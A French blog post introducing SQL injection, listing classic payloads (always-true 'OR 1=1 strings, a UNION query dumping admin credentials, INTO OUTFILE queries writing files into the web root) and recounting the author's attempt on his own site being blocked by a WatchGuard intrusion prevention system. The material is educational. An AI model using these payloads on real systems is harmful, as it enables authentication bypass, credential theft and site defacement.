0

Injection SQL. J’ai voulu injecter piregwan-genesis.com comme un hacker 😈 mais ça n’a pas fonctionnĂ© !

L’injection SQL est une mĂ©thode d’attaque trĂšs connue. C’est un vecteur d’attaque extrĂȘmement puissant quand il est bien exploitĂ©. Cette faille apparaĂźt quand il est possible d’injecter du code SQL dans les requĂȘtes SQL qui sont faites pour une page web. C’est actuellement la meilleure vulnĂ©rabilitĂ© Web en rapport frĂ©quence/surface d’exploitation.

Les consĂ©quences d’une faille SQL peuvent ĂȘtre multiples, du contournement de formulaires d’authentification au dump complet de la base de donnĂ©es en passant par l’exĂ©cution arbitraire de code.

Beaucoup d’exemples d’injection en français et les solutions pour les sĂ©curiser.

Exemple sur une requĂȘte simple

SELECT * from utilisateurs WHERE login='$login' AND password='$password'

Si le pseudo saisi est ‘ OR 1=1#, la requĂȘte devient :

SELECT * from utilisateurs WHERE login='' OR 1=1#' AND password='$password'

Equivalente Ă  :

SELECT * from utilisateurs WHERE login='' OR 1=1

Les injections de conditions toujours vraies comme 1=1

SELECT * FROM admin WHERE login='' OR '1'='1' AND pass='' OR '1'='1'

Voici une liste non-exhaustive d’instructions toujours vraies qui peuvent ĂȘtre utilisĂ©es

'='
'OR 1=1
'OR a=a
'OR'
'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="

Les liaisons entre les tables avec UNION

SELECT login, password FROM admin WHERE login='' UNION SELECT login, password from admin # ' and password='$password'

Redirection vers un fichier de sortie et manipulation de fichiers avec SQL !

SQL n’a pas fini de nous Ă©tonner : il est mĂȘme possible d’y manipuler des fichiers ! En effet, lorsque le privilĂšge FILES sous MySQL est accordĂ© Ă  l’utilisateur, il est possible d’utiliser les droits en lecture et en Ă©criture accordĂ©s Ă  l’utilisateur mysql du systĂšme.

SELECT login, password FROM admin WHERE login='' OR 'X'='X' INTO OUTFILE '../../www/file.txt' #' AND password='$password'";

SELECT boumboum FROM blabla WHERE badparam=-1 UNION SELECT 'Hacked !' INTO OUTFILE '/var/www/target/index.php' ;

Injections SQL avancées

https://www.bases-hacking.org/injections-sql-avancees.html

Lorsque j’ai voulu injecter piregwan-genesis.com est apparue la Firebox de WatchGuard 🙂

Je ne sais pas d’oĂč sort cette protection de la mort de derniĂšre minute WatchGuard Technologies (mon hĂ©bergeur ?) mais la tentative d’injection a Ă©tĂ© stoppĂ©e net et je suis trĂšs content, persuadĂ© que piregwan-genesis n’est pas Ă  l’abri d’injections.

Le service IPS de WatchGuard Technologies (Intrusion Prevention Service) protĂšge votre rĂ©seau contre une large gamme d’activitĂ©s malveillantes, y compris les injections SQL, les attaques de script intersites et les attaques par dĂ©passement de mĂ©moire tampon.

Vous pouvez Ă©valuer cet article en un clic. Garanti sans gluten. Merci !
(Evaluations : 0 / Moyenne : 0)

Piregwan pour Krakoukas.com

MaĂźtre des traditions et Grand malade Ă  World of Warcraft (18.000 heures de jeu), amateur de piments đŸŒ¶ïž au delĂ  de 30.000 Scoville et de pizza maison 🍕, j'aime les 3C (les chats đŸ˜Œ, le code et les choux de Bruxelles đŸ„Š) et la philosophie du CCC allemand (Chaos Computer Club đŸ’»).

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *